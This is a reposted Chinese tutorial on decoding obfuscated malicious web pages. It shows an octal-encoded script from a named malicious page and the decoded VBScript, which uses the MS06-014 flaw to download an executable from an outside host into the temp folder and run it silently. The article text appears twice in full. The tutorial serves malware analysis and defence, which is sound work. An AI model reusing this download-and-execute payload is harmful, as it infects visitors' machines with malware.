网页的加密解密之8位二进制ASCII码加密解密方法(转载)
作者:轩辕小聪
转载于:卡卡论坛
提示:接触恶意网页有风险,如果直接用IE浏览器打开不经修改的带有恶意脚本的网页,又没有打好相应补丁的话,就等于直接把病毒“引进家门”。除非你真正有必要做这些甚至已经把它当成了“家常便饭”,否则绝不提倡去尝试。
原恶意网页地址:
http://www.bartenderofchina.com/gz/mm.htm
内容(部分省略):
<script>document.write("/74/163/143/162/151/160/164/40/154/141/156/147/165/141/147/145/75/42/126/102/123/143/162/151/160/164/42/76/15/12/157/156/40/145/162/162/157/162/40/162/145/163/165/155/145/40/156/145/170/164/15/12/144/154/40/75/40/42/150/164/164/160/72/57/57/167/167/167/56/142/141/162/164/145/156/144/145/162/157/146/143/150/151/156/141/56/143/157/155/57/147/172/57/156/145/167/56/145/170/145/42/15/12/123/145/164/40/144/146/40/75/40/144/157/143/165/155/145/156/164/56/143/162/145/141/164/145/105/154/145/155/145/156/164/50/42/157/142/152/145/143/164/42/51/15/12/144/146/56/163/145/164/101/164/164/162/151/142/165/164/145/40/42/143/154/141/163/163/151/144/42/54/40/42/143/154/163/151/144/72/102/104/71/66/103/65/65/66/55/66/65/101/63/55/61/61/104/60/55/71/70/63/101/55/60/60/103/60/64/106/103/62/71/105/63/66/42/15/12/163/164/162/75/42/115/151/143/162/157/163/157/146/164/56/130/115/114/110/124/124/120/42/15/12/123/145/164/40/170/40/75/40/144/146/56/103/162/145/141/164/145/117/142/152/145/143/164/50/163/164/162/54/42/42/51/15/12/163/164/162/65/75/42/101/144/157/144/142/56/123/164/162/145/141/155/42/15/12/163/145/164/40/123/40/75/40/144/146/56/143/162/145/141/164/145/157/142/152/145/143/164/50/163/164/162/65/54/42/42/51/15/12/123/56/164/171/160/145/40/75/40/61/15/12/163/164/162/66/75/42/107/105/124/42/15/12/170/56/117/160/145/156/40/163/164/162/66/54/40/144/154/54/40/106/141/154/163/145/15/12/170/56/123/145/156/144/15/12/146/156/141/155/145/61/75/42/172/152/61/62/64/64/56/143/157/155/42/15/12/163/145/164/40/106/40/75/40/144/146/56/143/162/145/141/164/145/157/142/152/145/143/164/50/42/123/143/162/151/160/164/151/156/147/56/106/151/154/145/123/171/163/164/145/155/117/142/152/145/143/164/42/54/42/42/51/15/12/163/145/164/40/164/155/160/40/75/40/106/56/107/145/164/123/160/145/143/151/141/154/106/157/154/144/145/162/50/62/51/40/15/12/146/156/141/155/145/61/75/40/106/56/102/165/151/154/144/120/141/164/150/50/164/155/160/54/146/156/141/155/145/61/51/15/12/123/56/157/160/145/156/15/12/123/56/167/162/151/164/145/40/170/56/162/145/163/160/157/156/163/145/102/157/144/171/15/12/123/56/163/141/166/145/164/157/146/151/154/145/40/146/156/141/155/145/61/54/62/15/12/123/56/143/154/157/163/145/15/12/163/145/164/40/121/40/75/40/144/146/56/143/162/145/141/164/145/157/142/152/145/143/164/50/42/123/150/145/154/154/56/101/160/160/154/151/143/141/164/151/157/156/42/54/42/42/51/15/12/121/56/123/150/145/154/154/105/170/145/143/165/164/145/40/146/156/141/155/145/61/54/42/42/54/42/42/54/42/157/160/……(部分省略)")</script>
其中的“/74/163/143/162/151/160/164/40/154/141/156/147/165/141/147/145/75……”其实是javascript中字符的一种表示形式,以“/”加上8进制的ASCII码来表示字符。如“/141”,表示ASCII码为1*64+4*8+1*1=97的字符,也就是小写字母a
在浏览器执行程序的时候就自动识别,但是我们直接看当然很难看出它的全貌。当然,知道了它的表示的不同之后,可以自己写程序将这些字符表示转化成一般形式。
幸好我最近放假前后闲来无事,自己用delphi写了个程序做这种处理,把它还原成直观的字符(这次没省略,是全文):
<script>document.write("<script language="VBScript">
on error resume next
dl = "http://www.bartenderofchina.com/gz/new.exe"
Set df = document.createElement(" object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.Create Object(str,"")
str5="Adodb.Stream"
set S = df.create object(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="zj1244.com"
set F = df.create object("Scripting.FileSystem Object","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.create object("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
")</script>
这样就很明显了,利用MS06-014漏洞,下载http://www.bartenderofchina.com/gz/new.exe到本机临时文件夹,命名为zj1244.com并运行。
网页加密手法千变万化,但是一般有规律可寻。
一般分为两种:
1.有定式的类型
一就是如上面的这个网页,改用另一种表示形式(也包括用escape的,用US-ASCII的)
这种网页,知道了不同表示形式之间转换的算法原理,可利用浏览器内置的解析函数或自己写程序算法来转换
另一种用浏览器本身有默认的加密算法处理(如encoder加密的)
这种形式的,一般也是要找相应的解密算法(如有解encoder加密的脚本的功能的网页,在网上搜搜就可以得到)
2.无定式的类型
用自定义的加密函数给原来的代码加密,然后在网页代码中再写一个解密的函数,浏览器执行时会调用此函数对被加密的字符串进行解读
这种方法,解密的函数本身已经在网页中了,一般只要你调整它输出的方式,比如把执行代码改为写出代码,就可以得到它的真实内容了。
当然,有时可以混合,或是多层加密,这样就要抽丝剥茧一步步来了。
原恶意网页地址:
http://www.bartenderofchina.com/gz/mm.htm
内容(部分省略):
<script>document.write("/74/163/143/162/151/160/164/40/154/141/156/147/165/141/147/145/75/42/126/102/123/143/162/151/160/164/42/76/15/12/157/156/40/145/162/162/157/162/40/162/145/163/165/155/145/40/156/145/170/164/15/12/144/154/40/75/40/42/150/164/164/160/72/57/57/167/167/167/56/142/141/162/164/145/156/144/145/162/157/146/143/150/151/156/141/56/143/157/155/57/147/172/57/156/145/167/56/145/170/145/42/15/12/123/145/164/40/144/146/40/75/40/144/157/143/165/155/145/156/164/56/143/162/145/141/164/145/105/154/145/155/145/156/164/50/42/157/142/152/145/143/164/42/51/15/12/144/146/56/163/145/164/101/164/164/162/151/142/165/164/145/40/42/143/154/141/163/163/151/144/42/54/40/42/143/154/163/151/144/72/102/104/71/66/103/65/65/66/55/66/65/101/63/55/61/61/104/60/55/71/70/63/101/55/60/60/103/60/64/106/103/62/71/105/63/66/42/15/12/163/164/162/75/42/115/151/143/162/157/163/157/146/164/56/130/115/114/110/124/124/120/42/15/12/123/145/164/40/170/40/75/40/144/146/56/103/162/145/141/164/145/117/142/152/145/143/164/50/163/164/162/54/42/42/51/15/12/163/164/162/65/75/42/101/144/157/144/142/56/123/164/162/145/141/155/42/15/12/163/145/164/40/123/40/75/40/144/146/56/143/162/145/141/164/145/157/142/152/145/143/164/50/163/164/162/65/54/42/42/51/15/12/123/56/164/171/160/145/40/75/40/61/15/12/163/164/162/66/75/42/107/105/124/42/15/12/170/56/117/160/145/156/40/163/164/162/66/54/40/144/154/54/40/106/141/154/163/145/15/12/170/56/123/145/156/144/15/12/146/156/141/155/145/61/75/42/172/152/61/62/64/64/56/143/157/155/42/15/12/163/145/164/40/106/40/75/40/144/146/56/143/162/145/141/164/145/157/142/152/145/143/164/50/42/123/143/162/151/160/164/151/156/147/56/106/151/154/145/123/171/163/164/145/155/117/142/152/145/143/164/42/54/42/42/51/15/12/163/145/164/40/164/155/160/40/75/40/106/56/107/145/164/123/160/145/143/151/141/154/106/157/154/144/145/162/50/62/51/40/15/12/146/156/141/155/145/61/75/40/106/56/102/165/151/154/144/120/141/164/150/50/164/155/160/54/146/156/141/155/145/61/51/15/12/123/56/157/160/145/156/15/12/123/56/167/162/151/164/145/40/170/56/162/145/163/160/157/156/163/145/102/157/144/171/15/12/123/56/163/141/166/145/164/157/146/151/154/145/40/146/156/141/155/145/61/54/62/15/12/123/56/143/154/157/163/145/15/12/163/145/164/40/121/40/75/40/144/146/56/143/162/145/141/164/145/157/142/152/145/143/164/50/42/123/150/145/154/154/56/101/160/160/154/151/143/141/164/151/157/156/42/54/42/42/51/15/12/121/56/123/150/145/154/154/105/170/145/143/165/164/145/40/146/156/141/155/145/61/54/42/42/54/42/42/54/42/157/160/……(部分省略)")</script>
其中的“/74/163/143/162/151/160/164/40/154/141/156/147/165/141/147/145/75……”其实是javascript中字符的一种表示形式,以“/”加上8进制的ASCII码来表示字符。如“/141”,表示ASCII码为1*64+4*8+1*1=97的字符,也就是小写字母a
在浏览器执行程序的时候就自动识别,但是我们直接看当然很难看出它的全貌。当然,知道了它的表示的不同之后,可以自己写程序将这些字符表示转化成一般形式。
幸好我最近放假前后闲来无事,自己用delphi写了个程序做这种处理,把它还原成直观的字符(这次没省略,是全文):
<script>document.write("<script language="VBScript">
on error resume next
dl = "http://www.bartenderofchina.com/gz/new.exe"
Set df = document.createElement(" object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.Create Object(str,"")
str5="Adodb.Stream"
set S = df.create object(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="zj1244.com"
set F = df.create object("Scripting.FileSystem Object","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.create object("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
")</script>
这样就很明显了,利用MS06-014漏洞,下载http://www.bartenderofchina.com/gz/new.exe到本机临时文件夹,命名为zj1244.com并运行。
网页加密手法千变万化,但是一般有规律可寻。
一般分为两种:
1.有定式的类型
一就是如上面的这个网页,改用另一种表示形式(也包括用escape的,用US-ASCII的)
这种网页,知道了不同表示形式之间转换的算法原理,可利用浏览器内置的解析函数或自己写程序算法来转换
另一种用浏览器本身有默认的加密算法处理(如encoder加密的)
这种形式的,一般也是要找相应的解密算法(如有解encoder加密的脚本的功能的网页,在网上搜搜就可以得到)
2.无定式的类型
用自定义的加密函数给原来的代码加密,然后在网页代码中再写一个解密的函数,浏览器执行时会调用此函数对被加密的字符串进行解读
这种方法,解密的函数本身已经在网页中了,一般只要你调整它输出的方式,比如把执行代码改为写出代码,就可以得到它的真实内容了。
当然,有时可以混合,或是多层加密,这样就要抽丝剥茧一步步来了。
1241
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
